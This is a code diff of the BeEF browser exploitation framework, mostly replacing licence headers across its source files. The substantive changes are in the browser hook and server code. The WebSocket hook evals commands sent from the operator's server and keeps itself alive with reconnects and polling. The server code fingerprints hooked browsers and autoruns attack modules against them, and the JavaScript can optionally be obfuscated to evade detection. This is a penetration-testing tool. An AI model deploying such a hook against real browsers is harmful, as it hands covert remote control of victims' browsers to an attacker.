+        var webSocketPort = "<%= @websocket_port %>";
+        var webSocketSecure = "<%= @websocket_secure %>";
         var protocol = "ws://";
 
-        if(webSocketSecure)
+        if(webSocketSecure && window.location.protocol=="https:"){
             protocol = "wss://";
+            webSocketPort= "<%= @websocket_sec_port %>";
+        }
 
         if (beef.browser.isFF() && !!window.MozWebSocket) {
             beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
-
-        } else {
+        }else{
             beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
         }
 
     },
-    /* send Helo message to the BeEF server and start async communication*/
+
+    /**
+     * Send Helo message to the BeEF server and start async polling.
+     */
     start:function () {
         new beef.websocket.init();
         this.socket.onopen = function () {
-            //console.log("Socket has been opened!");
-
-            /*send browser id*/
             beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
-            //console.log("Connected and Helo");
             beef.websocket.alive();
-        }
+        };
+
         this.socket.onmessage = function (message) {
-            //console.log("Received message via WS."+ message.data);
+            //todo: double-check if there is a way to don't use eval here. It's not a big deal,
+            //todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted.
             eval(message.data);
-        }
+        };
 
+        this.socket.onclose = function () {
+            setTimeout(function(){beef.websocket.start()}, 5000);
+        };
     },
 
+    /**
+     * Send data back to BeEF. This is basically the same as beef.net.send,
+     * but doesn't queue commands.
+     * Example usage:
+     * beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
+     * '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
+     * '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
+     */
     send:function (data) {
-        this.socket.send(data);
-//        console.log("Sent [" + data + "]");
+        try {
+            this.socket.send(data);
+        }catch(err){}
     },
 
+    /**
+     * Polling mechanism, to notify the BeEF server that the browser is still hooked,
+     * and the WebSocket channel still alive.
+     * todo: there is probably a more efficient way to do this. Double-check WebSocket API.
+     */
     alive: function (){
         beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
-//        console.log("sent alive");
-        setTimeout("beef.websocket.alive()", beef.websocket.alive_timer);
-
+        setTimeout("beef.websocket.alive()", beef.websocket.ws_poll_timeout);
     }
 };
 

core/main/command.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/configuration.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/console/banners.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -40,12 +30,13 @@ module Banners
     def print_welcome_msg
         config = BeEF::Core::Configuration.instance
         version = config.get('beef.version')
-        print_info "Browser Exploitation Framework (BeEF)"
-        data =  "Version #{version}\n"
-        data += "Website http://beefproject.com\n"
-        data += "Run 'beef -h' for basic help.\n"
-        data += "Run 'git pull' to update to the latest revision."
+        print_info "Browser Exploitation Framework (BeEF) #{version}"
+        data = "Twit: @beefproject\n"
+        data += "Site: http://beefproject.com\n"
+        data += "Blog: http://blog.beefproject.com\n"
+        data += "Wiki: https://github.com/beefproject/beef/wiki\n"
         print_more data
+        print_info "Project Creator: " + "Wade Alcorn".red + " (@WadeAlcorn)"
     end
 
     #
@@ -89,12 +80,13 @@ module Banners
 
     def print_network_interfaces_routes
       configuration = BeEF::Core::Configuration.instance
+      prototxt = configuration.get("beef.http.https.enable") == true ? "https" : "http"
       
       self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array
         print_success "running on network interface: #{host}"
         beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
-        data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
-        data += "UI URL:   http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
+        data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
+        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
         
         print_more data
       end
@@ -105,13 +97,12 @@ module Banners
     #
     def print_loaded_extensions
       extensions = BeEF::Extensions.get_loaded
-      print_info "#{extensions.size} extensions loaded:"
+      print_info "#{extensions.size} extensions enabled."
       output = ''
 
-      
-      extensions.each do |key,ext|
-        output += "#{ext['name']}\n"
-      end
+      #extensions.each do |key,ext|
+      #  output += "#{ext['name']}\n"
+      #end
       
       print_more output
     end

core/main/console/commandline.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core

core/main/constants/browsers.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/constants/commandmodule.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/constants/distributedengine.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/constants/hardware.rb

@@ -0,0 +1,79 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+module Core
+module Constants
+  
+  # @note The hardware's strings for hardware detection.
+  module Hardware
+
+    HW_UNKNOWN_IMG        = 'pc.png'
+	HW_IPHONE_UA_STR      = 'iPhone'
+ 	HW_IPHONE_IMG         = 'iphone.jpg'
+	HW_IPAD_UA_STR	      = 'iPad'
+	HW_IPAD_IMG	          = 'ipad.png'
+	HW_IPOD_UA_STR	      = 'iPod'
+	HW_IPOD_IMG	          = 'ipod.jpg'
+	HW_BLACKBERRY_UA_STR  = 'BlackBerry'
+	HW_BLACKBERRY_IMG     = 'blackberry.png'
+	HW_WINPHONE_UA_STR    = 'Windows Phone'
+	HW_WINPHONE_IMG       = 'win.png'
+    HW_ZUNE_UA_STR        = 'ZuneWP7'
+    HW_ZUNE_IMG           = 'zune.gif'
+	HW_KINDLE_UA_STR      = 'Kindle'
+	HW_KINDLE_IMG         = 'kindle.png'
+	HW_NOKIA_UA_STR       = 'Nokia'
+	HW_NOKIA_IMG          = 'nokia.ico'
+	HW_HTC_UA_STR         = 'HTC'
+	HW_HTC_IMG            = 'htc.ico'
+	HW_MOTOROLA_UA_STR    = 'motorola'
+	HW_MOTOROLA_IMG       = 'motorola.png'
+	HW_GOOGLE_UA_STR      = 'Nexus One'
+	HE_GOOGLE_IM          = 'nexus.png'
+	HW_ERICSSON_UA_STR    = 'Ericsson'
+	HW_ERICSSON_IMG       = 'sony_ericsson.png'
+	HW_ALL_UA_STR         = 'All'
+
+        # Attempt to match operating system string to constant
+        # @param [String] name Name of operating system
+        # @return [String] Constant name of matched operating system, returns 'ALL'  if nothing are matched
+		def self.match_hardware(name)
+			case name.downcase
+				when /iphone/
+					HW_IPHONE_UA_STR
+				when /ipad/
+					HW_IPAD_UA_STR
+				when /ipod/
+					HW_IPOD_UA_STR
+				when /blackberry/
+					HW_BLACKBERRY_UA_STR
+				when /windows phone/
+					HW_WINPHONE_UA_STR
+				when /zune/
+					HW_ZUNE_UA_STR
+				when /kindle/
+					HW_KINDLE_UA_STR
+				when /nokia/
+					HW_NOKIA_UA_STR
+				when /motorola/
+					HW_MOTOROLA_UA_STR
+				when /htc/
+					HW_HTC_UA_STR
+				when /google/
+					HW_GOOGLE_UA_STR
+				when /ericsson/
+					HW_ERICSSON_UA_STR
+				else
+					'ALL'
+				end
+		end
+	
+  end
+  
+end
+end
+end

core/main/constants/os.rb

@@ -1,89 +1,78 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
-module Core
-module Constants
+  module Core
+    module Constants
 
-  # @note The OS'es strings for os detection.
-  module Os
+      # @note The OS'es strings for os detection.
+      module Os
 
-    OS_UNKNOWN_IMG        = 'unknown.png'
-  	OS_WINDOWS_UA_STR     = 'Windows'
-  	OS_WINDOWS_IMG        = 'win.png'
-  	OS_LINUX_UA_STR       = 'Linux'
-  	OS_LINUX_IMG          = 'linux.png'
-  	OS_MAC_UA_STR         = 'Mac'
-  	OS_MAC_IMG            = 'mac.png'
-	OS_QNX_UA_STR	      = 'QNX'
-	OS_QNX_IMG	      = 'qnx.ico'
-	OS_BEOS_UA_STR	      = 'BeOS'
-	OS_BEOS_IMG	      = 'beos.png'
-	OS_OPENBSD_UA_STR     = 'OpenBSD'
-	OS_OPENBSD_IMG	      = 'openbsd.ico'
-	OS_IPHONE_UA_STR      = 'iPhone'
- 	OS_IPHONE_IMG         = 'iphone.png'
-	OS_IPAD_UA_STR	      = 'iPad'
-	OS_IPAD_IMG	      = 'ipad.png'
-	OS_IPOD_UA_STR	      = 'iPod'
-	OS_IPOD_IMG	      = 'ipod.jpg'
-	OS_MAEMO_UA_STR	      = 'Maemo'
-	OS_MAEMO_IMG	      = 'maemo.ico'
-	OS_BLACKBERRY_UA_STR  = 'BlackBerry'
-	OS_BLACKBERRY_IMG     = 'blackberry.png'
-	OS_ANDROID_UA_STR     = 'Android'
-	OS_ANDROID_IMG        = 'android.png'
-    OS_ALL_UA_STR         = 'All'
+        OS_UNKNOWN_IMG = 'unknown.png'
+        OS_WINDOWS_UA_STR = 'Windows'
+        OS_WINDOWS_IMG = 'win.png'
+        OS_LINUX_UA_STR = 'Linux'
+        OS_LINUX_IMG = 'linux.png'
+        OS_MAC_UA_STR = 'Mac'
+        OS_MAC_IMG = 'mac.png'
+        OS_QNX_UA_STR = 'QNX'
+        OS_QNX_IMG = 'qnx.ico'
+        OS_BEOS_UA_STR = 'BeOS'
+        OS_BEOS_IMG = 'beos.png'
+        OS_OPENBSD_UA_STR = 'OpenBSD'
+        OS_OPENBSD_IMG = 'openbsd.ico'
+        OS_IOS_UA_STR = 'iOS'
+        OS_IOS_IMG = 'ios.png'
+        OS_IPHONE_UA_STR = 'iPhone'
+        OS_WEBOS_UA_STR = 'webos.png'
+        OS_IPHONE_IMG = 'iphone.jpg'
+        OS_IPAD_UA_STR = 'iPad'
+        OS_IPAD_IMG = 'ipad.png'
+        OS_IPOD_UA_STR = 'iPod'
+        OS_IPOD_IMG = 'ipod.jpg'
+        OS_MAEMO_UA_STR = 'Maemo'
+        OS_MAEMO_IMG = 'maemo.ico'
+        OS_BLACKBERRY_UA_STR = 'BlackBerry'
+        OS_BLACKBERRY_IMG = 'blackberry.png'
+        OS_ANDROID_UA_STR = 'Android'
+        OS_ANDROID_IMG = 'android.png'
+        OS_ALL_UA_STR = 'All'
 
         # Attempt to match operating system string to constant
         # @param [String] name Name of operating system
         # @return [String] Constant name of matched operating system, returns 'ALL'  if nothing are matched
-		def self.match_os(name)
-			case name.downcase
-				when /win/
-					OS_WINDOWS_UA_STR
-				when /lin/
-					OS_LINUX_UA_STR
-				when /os x/, /osx/, /mac/
-					OS_MAC_UA_STR
-				when /qnx/
-					OS_QNX_UA_STR
-				when /beos/
-					OS_BEOS_UA_STR
-				when /openbsd/
-					OS_OPENBSD_UA_STR
-				when /iphone/
-					OS_IPHONE_UA_STR
-				when /ipad/
-					OS_IPAD_UA_STR
-				when /ipod/
-					OS_IPOD_UA_STR
-				when /maemo/
-					OS_MAEMO_UA_STR
-				when /blackberry/
-					OS_BLACKBERRY_UA_STR
-				when /android/
-					OS_ANDROID_UA_STR
-				else
-					'ALL'
-				end
-		end
+        def self.match_os(name)
+          case name.downcase
+            when /win/
+              OS_WINDOWS_UA_STR
+            when /lin/
+              OS_LINUX_UA_STR
+            when /os x/, /osx/, /mac/
+              OS_MAC_UA_STR
+            when /qnx/
+              OS_QNX_UA_STR
+            when /beos/
+              OS_BEOS_UA_STR
+            when /openbsd/
+              OS_OPENBSD_UA_STR
+            when /ios/, /iphone/, /ipad/, /ipod/
+              OS_IOS_UA_STR
+            when /maemo/
+              OS_MAEMO_UA_STR
+            when /blackberry/
+              OS_BLACKBERRY_UA_STR
+            when /android/
+              OS_ANDROID_UA_STR
+            else
+              'ALL'
+          end
+        end
 
+      end
+
+    end
   end
-  
-end
-end
 end

core/main/crypto.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/distributed_engine/models/rules.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/handlers/browserdetails.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
@@ -34,6 +24,9 @@ module BeEF
         end
 
         def setup()
+          print_debug "[INIT] Processing Browser Details..."
+          config = BeEF::Core::Configuration.instance
+
           # validate hook session value
           session_id = get_param(@data, 'beefhook')
           (self.err_msg "session id is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(session_id)
@@ -118,6 +111,14 @@ module BeEF
             self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
           end
 
+          # get and store the hardware name
+          hw_name = get_param(@data['results'], 'Hardware')
+          if BeEF::Filters.is_valid_hwname?(hw_name)
+            BD.set(session_id, 'Hardware', hw_name)
+          else
+            self.err_msg "Invalid hardware name returned from the hook browser's initial connection."
+          end
+
           # get and store the date
           date_stamp = get_param(@data['results'], 'DateStamp')
           if BeEF::Filters.is_valid_date_stamp?(date_stamp)
@@ -222,6 +223,14 @@ module BeEF
             self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasPhonegap
+          has_phonegap = get_param(@data['results'], 'HasPhonegap')
+          if BeEF::Filters.is_valid_yes_no?(has_phonegap)
+            BD.set(session_id, 'HasPhonegap', has_phonegap)
+          else
+            self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasGoogleGears
           has_googlegears = get_param(@data['results'], 'HasGoogleGears')
           if BeEF::Filters.is_valid_yes_no?(has_googlegears)
@@ -263,23 +272,29 @@ module BeEF
           end
 
           # log a few info of newly hooked zombie in the console
-          print_info "New Hooked Browser [ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
+          print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
 
 
           # Call autorun modules
-          autorun = []
-          BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
-            if v.has_key?('autorun') and v['autorun'] == true
-              if BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name}) == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
-                BeEF::Module.execute(k, session_id)
-                autorun.push(k)
-              else
-                print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser #{zombie.ip}"
+          if config.get('beef.autorun.enable')
+            autorun = []
+            BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
+              if v.has_key?('autorun') and v['autorun'] == true
+                target_status = BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name})
+                if target_status == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
+                  BeEF::Module.execute(k, session_id)
+                  autorun.push(k)
+                elsif target_status == BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify')
+                  BeEF::Module.execute(k, session_id)
+                  autorun.push(k)
+                else
+                  print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
+                end
               end
+            }
+            if autorun.length > 0
+              print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
             end
-          }
-          if autorun.length > 0
-            print_info "Autorun executed: #{autorun.join(', ')} against Hooked browser #{zombie.ip}"
           end
         end
 

core/main/handlers/commands.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core

core/main/handlers/hookedbrowsers.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/handlers/modules/beefjs.rb

@@ -1,136 +1,162 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Core
-module Handlers
-module Modules
+  module Core
+    module Handlers
+      module Modules
 
-  # @note Purpose: avoid rewriting several times the same code.
-  module BeEFJS
+        # @note Purpose: avoid rewriting several times the same code.
+        module BeEFJS
 
-    # Builds the default beefjs library (all default components of the library).
-    # @param [Object] req_host The request object
-    def build_beefjs!(req_host)
-      config = BeEF::Core::Configuration.instance
-      # @note set up values required to construct beefjs
-      beefjs = ''
-      # @note location of sub files
-      beefjs_path = "#{$root_dir}/core/main/client/"
-      # @note we load websocket library only if ws server is enabled in config.yalm
-      # check in init.js
-      if config.get("beef.http.websocket.enable")
-        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js)
-      else
-        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
-      end
+          # Builds the default beefjs library (all default components of the library).
+          # @param [Object] req_host The request object
+          def build_beefjs!(req_host)
+            config = BeEF::Core::Configuration.instance
+            # @note set up values required to construct beefjs
+            beef_js = ''
+            # @note location of sub files
+            beef_js_path = "#{$root_dir}/core/main/client/"
 
-      # @note construct the beefjs string from file(s)
-      js_sub_files.each {|js_sub_file_name|
-        js_sub_file_abs_path = beefjs_path + js_sub_file_name
-        beefjs << (File.read(js_sub_file_abs_path) + "\n\n")
-      }
+            # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
+            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
 
-      # @note create the config for the hooked browser session
+            # @note BeEF libraries: need Eruby evaluation and obfuscation
+            beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
+            # @note Load websocket library only if WS server is enabled in config.yaml
+            if config.get("beef.http.websocket.enable") == true
+              beef_js_sub_files << "websocket.js"
+            end
 
-      hook_session_name = config.get('beef.http.hook_session_name')
-      hook_session_config = BeEF::Core::Server.instance.to_h
+            # @note antisnatchor: leave timeout.js as the last one!
+            beef_js_sub_files << "timeout.js"
 
-      # @note if http_host="0.0.0.0" in config ini, use the host requested by client
-      if hook_session_config['beef_host'].eql? "0.0.0.0"
-        hook_session_config['beef_host'] = req_host
-        hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
-      end
+            ext_js_to_obfuscate = ''
+            ext_js_to_not_obfuscate = ''
 
-      # @note if http_port <> public_port in config ini, use the public_port
-      unless hook_session_config['beef_public_port'].nil?
-        if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
-          hook_session_config['beef_port'] = hook_session_config['beef_public_port']
-          hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
-          if hook_session_config['beef_public_port'] == '443'
-            hook_session_config['beef_url'].sub!(/http:/, 'https:')
+            # @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate
+            # @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate
+            ext_js_sub_files.each{ |ext_js_sub_file|
+              if config.get("beef.extension.evasion.enable")
+                if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file)
+                  print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list"
+                  # do not obfuscate the file
+                  ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                  ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+                else
+                  ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                  ext_js_to_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+                end
+              else
+                # Evasion is not enabled, do not obfuscate anything
+                ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+              end
+            }
+
+            # @note construct the beef_js string from file(s)
+            beef_js_sub_files.each { |beef_js_sub_file|
+              beef_js_sub_file_path = beef_js_path + beef_js_sub_file
+              beef_js << (File.read(beef_js_sub_file_path) + "\n\n")
+            }
+
+            # @note create the config for the hooked browser session
+            hook_session_config = BeEF::Core::Server.instance.to_h
+
+            # @note if http_host="0.0.0.0" in config ini, use the host requested by client
